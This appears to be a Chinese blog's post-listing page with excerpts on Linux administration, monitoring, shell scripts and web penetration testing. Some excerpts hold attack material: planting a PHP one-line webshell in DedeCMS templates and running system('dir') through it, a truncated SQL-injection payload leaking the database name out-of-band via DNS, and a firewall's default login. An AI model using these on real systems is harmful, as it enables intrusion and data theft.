- 博客(63)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 topsec—基础配置
1. WAF端设置(1)默认使用网络接口:ETH0(2)默认IP地址:192.168.1.2542. PC端设置(1)主机IPV4地址设置:192.168.1.*(1<*<255,即只需1网段下地址即可)(2)设置ipv4地址的相对应IP掩码、默认网管地址3. web端login设置(1)账号:Superman(2)首次登录默认密码:talent(3)修改之后使用密码:Talent@1...
2018-03-29 08:51:55
4602
原创 web渗透—xss之基于DOM漏洞
这个漏洞往往存在于客户端脚本,如果一个Javascript脚本访问需要参数的URL,且需要将该信息用于写入自己的页面,且信息未被编码,那么就有可能存在这个漏洞。
2017-11-14 13:45:47
4792
原创 web渗透—xss攻击
XSS漏洞是相当有危害的,在开发Web应用的时候,一定要记住过滤数据,特别是在输出到客户端之前,这是现在行之有效的防止XSS的手段。
2017-11-10 09:36:10
891
原创 web渗透—xss攻击防御
1、基于特征的防御XSS漏洞和著名的SQL注入漏洞一样,都是利用了Web页面的编写不完善,所以每一个漏洞所利用和针对的弱点都不尽相同。这就给XSS漏洞防御带来了困难:不可能以单一特征来概括所有XSS攻击。传统XSS防御多采用特征匹配方式,在所有提交的信息中都进行匹配检查。对于这种类型的XSS攻击,采用的模式匹配方法一般会需要对“javascript”这个关键字进行检索,一旦发现提交信息中包
2017-11-10 09:31:24
1409
原创 web渗透—SQL注入思路
当拿到一个MySQL的注入点的时候,我们需要判断MySQL的版本。因为当MySQL的版本小于4.0时,是不支持union select联合查询的;当MySQL版本大于5.0时,有个默认数据库information_schema,里面存放着所有数据库的信息(比如表名、列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。现在一般情况下,MySQL都是4.0以上的,所以我们就放心的用联合查
2017-11-01 14:29:45
787
原创 lvs+keepalived和haproxy+heartbeat区别
目前使用比较多的就是标题中提到的这两者,其实lvs和haproxy都是实现的负载均衡的作用,keepalived和heartbeat都是提高高可用性的,避免单点故障。那么他们为什么这么搭配,而又有什么区别呢?
2017-11-01 14:21:30
1979
原创 md5加密规则
关于MD5加密 MD5的典型应用是对一段信息(Message)产生信息摘要(Message-Digest),以防止被篡改。比如,在UNIX下有很多软件在下载的时候都有一个文件名相同,文件扩展名为.md5的文件,在这个文件中通常只有一行文本,大致结构如: MD5 (tanajiya.tar.gz) = 0ca175b9c0f726a831d895e269332461 这就是
2017-11-01 14:17:51
3726
原创 web渗透—工具burpsuit的使用
1、更改代理地址后,可以利用此工具来审计手机上的APP,功能强大!缺点:手机会卡2、SQL注入时,,启用burpsuit代理,会监控网站访问的数据流量,从而可以找到注入点进行注入测试。3、通过域名-IP,可以代外,方便盲注代外一句话:and select load_file(concat('\\\\',(select DATABASE()),'.mx
2017-11-01 14:14:50
941
原创 web渗透—wireshark过滤
1.过滤IP,如来源IP或者目标IP等于某个IP例子:ip.src eq 192.168.1.107 or ip.dst eq 192.168.1.107或者ip.addr eq 192.168.1.107 // 都能显示来源IP和目标IP2.过滤端口例子:tcp.port eq 80 // 不管端口是来源的还是目标的都显示tcp.port == 80tcp.p
2017-11-01 14:11:38
545
原创 web渗透——PHP一句话插入
一句话: //as是形式参数位置:1、模块——模块管理——文件管理器2、模板——模板管理——标签源码管理3、、、进入,选择.PHP文件,插入一句话使用:1、在网页上,、、、/dede/ad_add.php?as=system('dir'); //可以显示该目录下的文件、文件大小以及字节数
2017-10-20 10:26:35
5159
原创 web渗透——SQL注入漏洞攻击步骤
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以市面的防火墙都不会对SQL注入发出警报,如果管理员没查看ⅡS日志的习惯,可能被入侵很长时间都不会发觉。但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况,需要构造巧妙的SQL语句,从而成功获取想要的数据。
2017-10-19 14:49:00
8907
原创 错误——MySQL在navicat打开时出现1045
打开Navicat Lite for MySQL客户端,提示1045 access denied for user ’root’@’localhost’ using password yes太不给力了,网上搜了很多资料,最终问题得以解决,下面将详细的解决过程分享给大家,希望遇到同样问题的同胞,少走弯路:
2017-09-26 12:50:22
7971
1
原创 html——触发器增加、删除、显示行数
1+1=3 //生成ul window.onload = function(){ var oUi = document.getElementsByTagName("ul"); var str = ""; f
2017-09-20 16:56:17
839
原创 html——jQuery练习题2
每间隔10秒检查用户在文本框中输入的数字和层中显示的数字是否相同,如果不同,则用文本框中的数字替换层中显示的数字
2017-09-20 11:05:25
687
原创 html——javasprit脚本之DOM
1+1=3 //生成ul window.onload = function(){ var oUi = document.getElementsByTagName("ul"); var str = ""; for(var i
2017-09-18 08:47:35
1148
原创 JavaScript脚本——简单运算
function 加法( ){var numb1= document.qwe.num1.value;var numb2= document.qwe.num2.value;var total=parseFloat(numb1)+parseFloat(numb2);document.qwe.getAnswer.value=total; alert(total);}
2017-09-12 16:02:27
565
原创 HTML标签
标签 描述基础 定义文档类型。 定义 HTML 文档。 定义文档的标题。 定义文档的主体。 to 定义 HTML 标题。 定义段落。 定义简单的折行。 定义水平线。 定义注释。格式 定义只取首字母的缩
2017-09-08 08:31:41
231
原创 运维参考题
1.常见的Linux发行版本都有什么?你最擅长哪一个?2.执行了rm-rf*,会有哪些情况发生?请举例3.如何使用命令查出Linux系统下某占用某个端口(8080)具体是哪个进程?4.如何将本地80端口的请求转发到8080端口,当前主机IP为192.168.2.1?5.crontab 在11月份内,每天的早上6点到12点钟,每隔2小时执行一次/usr
2017-09-06 12:48:04
487
原创 VMware上centos网卡配置
编辑网卡配置文件:/etc/sysconfig/network-scripts/ifcfg-eth0附上一则最简配置:NAME=eth0ONBOOT=yesIPADDR0=192.168.35.128 (特别注意:IP地址必须和本机在同一网段,否则无法连接)PREFIX0=24GATEWAY0=192.16
2017-09-05 14:58:55
252
原创 防火墙——NAT与iptables
一、Iptables1、Linux Kernel中的包过滤防火墙(1)Ipfw/ipfwadm 2.0.*中使用移植于BSD的ipfw 缺点:包过滤、NAT等代码混杂在整个网络相关代码中(2)Ipchains 2.2.*中使用(3)Netfilter/iptables 2.4.*iptables 可以从 www.ne
2017-09-05 12:50:01
792
原创 错误autoreconf unable found ——生成configure文件时
在生成configure文件时,执行命令 autoreconf -iv时出现错误:autoreconf unable found 执行命令: apt-get install autoreconf automake libtool apt-get install libffi-dev
2017-09-05 10:16:10
1089
原创 ./configure命令无法执行——源码编译、安装
在进行软件源码编译、安装时,./configure命令无法执行,发现在该目录下缺少configure文件,需要生成该文件生成configure文件命令 autoreconf -iv 生成configure文件,执行即可
2017-09-05 10:11:24
17807
原创 make无法执行——源码编译、安装
在进行软件源码编译、安装时 ,出现make无法执行的情况下,是缺少基础开发包执行命令即可: apt-get install build-essential
2017-09-05 10:03:09
3523
原创 渗透测试流程——Windows服务器
相应名词解释端口(port)可以认为是计算机与外界通信交流的出口。其中硬件领域的端口又称为接口,如USB端口、串行端口等。软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和I/O(基本输入/输出)缓冲区。端口是传输层的内容,是面向连接的,它们对应着网络上常见的一些服务。这些常见的服务可划分为使用TCP端口(面向连接,如打电话)
2017-09-05 08:34:33
1101
原创 cacti监控部署——网络流量监控
Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。它通过snmpget来获取数据,使用RRDtool绘画图形,而且你完全可以不需要了解RRDtool复杂的参数。它提供了非常强大的数据和用户管理功能,可以指定每一个用户能查看树状结构、host以及任何一张图,还可以与LDAP结合进行用户验证,同时也能自己增加模板,功能非常强大完善,界面友好。
2017-09-04 14:57:58
5936
原创 Linux开机启动流程
启动第一步——加载BIOS当 你打开计算机电源,计算机会首先加载BIOS信息,BIOS信息是如此的重要,以至于计算机必须在最开始就找到它。这是因为BIOS中包含了CPU的相关 信息、设备启动顺序信息、硬盘信息、内存信息、时钟信息、PnP特性等等。在此之后,计算机心里就有谱了,知道应该去读取哪个硬件设备了。启动第二步——读取MBR众所 周知,硬盘上第0磁道第一个扇区被称为MBR,也就
2017-09-04 14:42:25
237
原创 shell脚本——比较不同目录下所有文件
#!/bin/bash#遍历目录函数list_alldir(){ for road in `ls -a $1` do if [ x"$road" != x"." -a x"$road" != x".." ];then if [ -d "$1/$road" ];then echo "$1/$
2017-09-01 18:03:08
1562
原创 shell脚本——不同目录下同名文件内容比较
#!/bin/bash#遍历目录函数list_alldir(){ for road in `ls -a $1` do if [ x"$road" != x"." -a x"$road" != x".." ];then if [ -d "$1/$road" ];then echo "$1/$
2017-09-01 17:54:15
2449
原创 shell脚本——统计不同目录下同名文件个数
#!/bin/bash#遍历目录函数list_alldir(){ for road in `ls -a $1` do if [ x"$road" != x"." -a x"$road" != x".." ];then if [ -d "$1/$road" ];then echo "$1/$
2017-09-01 17:52:00
798
原创 shell脚本——判断文件的属性、内容、、
#!/bin/sh #文件路径 :/usr/local/1.txtread myfile1read myfile2#判断文件1是否存在if [ -e $myfile1 ]; then echo '文件存在'; #判断文件1是否为空 if [ -s $myfile1 ]; then echo '这个文件不为空';
2017-09-01 14:07:43
8462
原创 shell脚本——比较两个文件大小、权限
#!/bin/bash#创建文件/usr/local/1.txt、/etc/local/2.txt,分别给权限655、712#文件的字节数 、字数、行数wc /usr/local/1.txt >aa.txtwc /etc/local/2.txt >bb.txt#文件的大小du -h --max-depth=2 /usr/local/1.txt >>
2017-08-31 15:05:34
5885
原创 Apache配置文件
# This is the main Apache server configuration file. It contains the# configuration directives that give the server its instructions.# See for detailed information.# In particular, see# #
2017-08-31 10:16:49
422
原创 实战CentOS6.3部署Hadoop集群服务
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,Hadoop实现了一个分布式文件系统(Hadoop Distributed File System),简称HDFS。HDFS有高容错性特点,并且设计用来部署在低廉的(low-cost)硬件上;而且它提供高吞吐量(high throughput)来访问应用程序的数据,适合那些有着超大数据集(large data set)的应用程序;HDFS放宽了(relax)POSIX的要求,可以以流的形式访问(streaming access)文件系统中的数
2017-08-30 17:39:41
394
原创 CentOS 7 升级内核
一、 查看当前的内核版本:[root@localhost ~]# uname -srLinux 3.10.0-514.26.2.el7.x86_64二、查看最新的内核版本:登陆 https://www.kernel.org 来查看最新的kernel 版本,当前时间最新的是mainline:4.13-rc5三、升级内核版本: 升级内核版本的方法有两种,一
2017-08-30 16:36:50
434
原创 zabbix 网络监控 -- 监控LINUX主机
zabbix由2部分构成,zabbix server与可选组件zabbix agent。zabbix agent需要安装在被监视的目标服务器上,它主要完成对硬件信息或与操作系统有关的内存,CPU等信息的收集。zabbix agent可以运行在linux ,Solaris, HP-UX, AIX, Free BSD, Open BSD, OS X, Tru64/OSF1, Windows NT4.0, Windows 2000/2003/XP/Vista)等系统之上。
2017-08-30 14:36:53
2051
原创 zabbix 网络监控 -- 服务端的配置
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供柔软的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。
2017-08-30 12:59:18
1014
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人